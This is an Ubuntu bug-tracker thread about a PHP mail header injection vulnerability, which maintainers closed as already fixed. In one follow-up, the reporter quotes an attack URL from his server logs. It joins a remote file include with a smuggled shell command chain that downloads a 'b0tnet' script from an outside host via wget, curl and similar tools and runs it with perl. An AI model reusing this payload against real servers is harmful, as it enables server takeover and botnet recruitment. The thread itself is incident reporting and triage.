Ubuntu
php-mail package

PHP Folded Mail Headers Email Header Injection Vulnerability

Bug #113249 reported by Jim Tarvid
254
Affects Status Importance Assigned to Milestone
php-mail (Ubuntu)
Fix Released
High
Kees Cook

Bug Description

Binary package hint: php-mail

My 6.06.1 LTS web server is being pummeled.

I am going to break 50 sites by turning off mail in php.ini.

Not Vulnerable: PHP PHP 5.2.2

http://www.securityfocus.com/bid/23145

Revision history for this message
Kees Cook (kees) wrote :

Thanks for taking the time to report this bug and helping to make Ubuntu better. This problem has already been addressed with the following USN:

http://www.ubuntu.com/usn/usn-455-1

Please feel free to report future bugs.

Changed in php-mail:
assignee: nobody → keescook
importance: Undecided → High
status: Unconfirmed → Fix Released
Revision history for this message
Jim Tarvid (tarvid) wrote : Re: [Bug 113249] Re: PHP Folded Mail Headers Email Header Injection Vulnerability

The default installation leaves servers vulnerable.

Having spent some time on PHP security I still have not found an
acceptable compromise of functionality and security.

The latest exploit here involved urls like -

http://silverdollarmusicpark.com/index1.php?content=http://kuskitiz0r.kit.net/cmdpriv8/tool25.dat?&cmd=cd
/tmp;wget http://msnpassport.t5.com.br/bot/b0tnet.txt;fetch
http://msnpassport.t5.com.br/bot/b0tnet.txt;curl -O
http://msnpassport.t5.com.br/bot/b0tnet.txt;lynx
http://msnpassport.t5.com.br/bot/b0tnet.txt > b0tnet.txt;GET
http://msnpassport.t5.com.br/bot/b0tnet.txt > b0tnet.txt;lwp-download
http://msnpassport.t5.com.br/bot/b0tnet.txt;perl b0tnet.txt

; Whether to allow include/require to open URLs (like http:// or
ftp://) as files.
allow_url_include = Off

plugs this hole (I think)

/etc/php5/apache2/php.ini should be reasonably safe by default.

On 5/14/07, Kees Cook <email address hidden> wrote:
> Thanks for taking the time to report this bug and helping to make Ubuntu
> better. This problem has already been addressed with the following USN:
>
> http://www.ubuntu.com/usn/usn-455-1
>
> Please feel free to report future bugs.
>
> ** Visibility changed to: Public
>
> ** Changed in: php-mail (Ubuntu)
> Importance: Undecided => High
> Assignee: (unassigned) => Kees Cook
> Status: Unconfirmed => Fix Released
>
> --
> PHP Folded Mail Headers Email Header Injection Vulnerability
> https://bugs.launchpad.net/bugs/113249
> You received this bug notification because you are a direct subscriber
> of the bug.
>

Revision history for this message
Kees Cook (kees) wrote :

The latter part of that URL would imply a PHP script's insecue use of a "system" or "passthru" call. The earlier part would imply, as you say, a url-load from "include" (or "fopen") where an application has not validated the file path. Either way, these are problems specific to the script, not php5 itself.

Since this bug report was related to CVE-2007-1718 and has been closed, please move the discussion elsewhere:
- If there is a bug specific to php5 itself, please open a new bug report.
- If you're interested in seeing the default setting for "allow_url_include" to be changed, please bring this up on the ubuntu-devel mailing list. Note, however, that the system default on current Ubuntu system is already "allow_url_include = Off"

Thanks again for the report, and please feel free to report any new bugs you may find.

To post a comment you must log in.
This report contains Public Security information  
Everyone can see this security related information.
Subscribing...

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.